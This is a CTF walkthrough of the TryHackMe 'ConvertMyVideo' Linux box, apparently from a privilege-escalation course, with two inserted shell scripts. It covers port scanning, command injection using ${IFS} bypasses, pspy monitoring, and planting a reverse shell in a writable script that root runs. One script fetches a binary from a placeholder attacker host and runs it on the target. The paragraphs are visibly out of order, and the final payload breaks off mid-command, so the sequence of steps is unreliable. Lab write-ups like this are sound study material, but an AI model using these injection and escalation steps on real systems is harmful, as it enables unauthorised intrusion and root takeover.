Today I rooted the ‘ConvertMyVideo’ machine on TryHackMe as part of TCM’s Linux Privilege Escalation course, and decided I had learnt a fair amount from it and should lock it into my memory by writing about it.

Once I had this, I tried using more complicated commands, such as using netcat to call back to our machine; however, I kept running into issues with the command getting snapped into bits by the script.

Firstly you need to do some enumeration, mainly because you need to know whether to use pspy32 or pspy64, which depends on the architecture of the system. I check this with the dpkg --print-architecture command, but there are multiple other ways (uname -m is another).

I do two scans: an all-purpose scan against all ports with -p-, and then an aggressive scan with -A against only the ports noted as open.
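The two-stage scan above, as an added example that is not from the original post: stage one sweeps every TCP port with grepable output, a small parser pulls the open ports out of that file, and stage two runs -A against just those ports. The target address is a placeholder you supply as the first argument, and the .gnmap snippet inside is constructed to show the parser, not real scan output.

```shell
#!/bin/sh
# Added example, not from the original post. Stage 1: all 65535 TCP ports with
# grepable output (-oG). Stage 2: -A (version detection, default scripts, OS
# detection, traceroute) only on the ports stage 1 found open, which is far
# quicker than running -A across every port.

# Extract the open TCP ports from an nmap -oG file as a comma-separated list.
# Each entry in the "Ports:" field looks like port/state/proto/owner/service/...
open_ports() {
  # $1: path to the -oG output file
  grep 'Ports:' "$1" \
    | sed 's/^.*Ports: //; s/[[:space:]]*Ignored State.*$//' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//' \
    | awk -F/ '$2 == "open" && $3 == "tcp" { printf "%s%s", sep, $1; sep="," }'
}

# Run both stages against one host; writes all-ports.gnmap and aggressive.nmap.
scan() {
  # $1: target host or IP (placeholder, supplied by the caller)
  nmap -p- -T4 -oG all-ports.gnmap "$1" >/dev/null
  ports=$(open_ports all-ports.gnmap)
  [ -n "$ports" ] || { echo "no open TCP ports found" >&2; return 1; }
  nmap -A -p "$ports" -oN aggressive.nmap "$1"
}

# Constructed sample of stage-1 output (not a real scan) used to exercise the
# parser offline; 443 and 8080 are there to show non-open states are skipped.
SAMPLE_GNMAP='# Nmap 7.80 scan initiated
Host: 10.10.10.10 ()  Status: Up
Host: 10.10.10.10 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///, 8080/filtered/tcp//http-proxy///  Ignored State: closed (65531)
# Nmap done'

demo() {
  tmp=$(mktemp)
  printf '%s\n' "$SAMPLE_GNMAP" > "$tmp"
  open_ports "$tmp"
  rm -f "$tmp"
}

if [ -n "${1:-}" ]; then
  scan "$1"
else
  demo; echo
fi
```

Run it as ./scan.sh 10.10.10.10 to scan; with no argument it just parses the constructed sample and prints 22,80. The parser keys on the state and protocol fields rather than on service names, so it behaves the same whether or not stage one used -sV.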

Honestly, I am not the biggest fan of web application pentesting, but I did enjoy tampering with the traffic a little here, likely because there wasn’t actually a lot to test.

After doing that, you can transfer pspy, make it executable and run it. I transferred the static version by hosting a Python HTTP server and using wget. I couldn’t use the dynamically linked version due to library errors.

So for this, with no tools active, I just put in a valid entry and an invalid entry and checked what the differences were. Nothing dramatic happens, apart from some of the wording on the page changing.

Next, navigate to the main website and get the script running (by inputting a fake YouTube ID and hitting Convert); pspy should then populate with the commands running on the system.
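The pspy steps above (check the architecture, transfer the static build, make it executable, run it while the conversion job is triggered), as an added example that is not from the original post. The attacker IP is a placeholder passed as the first argument; the HTTP server port 8000 and the /tmp drop location are assumptions, and the target-side commands in fetch_and_run only run when that argument is given.

```shell
#!/bin/sh
# Added example, not from the original post: choose the right pspy build for
# the target, pull it over from the attacker box, and run it.

# Map the target's architecture string to a pspy release file name. Accepts
# the output of either `dpkg --print-architecture` (amd64, i386) or `uname -m`
# (x86_64, i686). The trailing "s" selects the statically linked build, which
# avoids the shared-library errors the dynamic build can hit on older boxes.
pick_pspy() {
  case "$1" in
    amd64|x86_64) echo pspy64s ;;
    i386|i686)    echo pspy32s ;;
    *) echo "no pspy build for architecture '$1'" >&2; return 1 ;;
  esac
}

# Detect the architecture with whichever tool the box has.
target_arch() {
  if command -v dpkg >/dev/null 2>&1; then
    dpkg --print-architecture
  else
    uname -m
  fi
}

# Target side. Assumes the attacker box is serving the pspy binaries with
#   python3 -m http.server 8000
# from the directory that holds them. If /tmp is mounted noexec, use /dev/shm.
fetch_and_run() {
  # $1: attacker IP (placeholder)
  bin=$(pick_pspy "$(target_arch)") || return 1
  cd /tmp || return 1
  wget -q "http://$1:8000/$bin" -O "$bin" || return 1
  chmod +x "$bin"
  # Leave this in the foreground, then submit a fake video ID in the web form
  # from another session; the commands the job runs appear here as it works.
  ./"$bin"
}

if [ -n "${1:-}" ]; then
  fetch_and_run "$1"
else
  # Standalone: just report which build this host would need.
  pick_pspy "$(target_arch)"
fi
```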

The first thing I did from this point was load up Burp Suite and capture the traffic after I hit the Convert button, to see exactly what is going on.

If we go and look at the script, it is a simple script that runs rm -rf downloads, which cleans the downloads folder. If the script is writable by us but executed by a more privileged user, we can take this opportunity to inject some code; I put a bash one-liner in for a reverse shell.

So now we can begin attempting different types of bypasses and see if we can get a command to work on the machine. I picked the simple commands ls and pwd; I picked two in an attempt to avoid any false negatives throwing me off.

The machine itself is a Linux box with a simple foothold (in theory) with some defenses; after that we need to do more in-depth enumeration than I have done before to get root.

That gives us a little bit of information to go on; we will likely be looking to break some form of program or script.

The results of the command are hidden within the error, so it is important to know what a normal error looks like, allowing you to pick out the differences easily.

Once the script is uploaded, as per fig 4, you can then send through a command to execute it (but set up your listener first!). I originally tried $(./.sh) but that didn’t work; I had to use $(bash${IFS}